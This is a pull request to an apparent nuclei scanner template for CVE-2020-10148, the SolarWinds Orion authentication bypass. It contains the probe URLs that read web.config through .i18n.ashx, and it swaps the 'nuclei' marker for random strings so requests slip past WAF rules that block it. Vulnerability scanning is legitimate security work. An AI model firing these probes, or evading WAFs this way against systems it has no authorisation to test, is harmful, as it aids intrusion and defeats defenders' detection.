### PR TITLE
replaced nuclei str by randon (avoid waf rules with nuclei string. Yeap, really)

### DIFF
--- a/cves/2020/CVE-2020-10148.yaml
+++ b/cves/2020/CVE-2020-10148.yaml
@@ -22,8 +22,8 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
-      - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
+      - "{{BaseURL}}/web.config.i18n.ashx?l={{rand_text_alphanumeric(4)}}&v={{rand_text_alphanumeric(4)}}"
+      - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{rand_text_alphanumeric(4)}}&v={{rand_text_alphanumeric(4)}}"
 
     stop-at-first-match: true
     matchers-condition: and


### PR DESCRIPTION
### Template / PR Information

The company I work for (a big telecom) has some waf rules to catch "nuclei" string and block
So this should help in such situation


### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

.gg/projectdiscovery)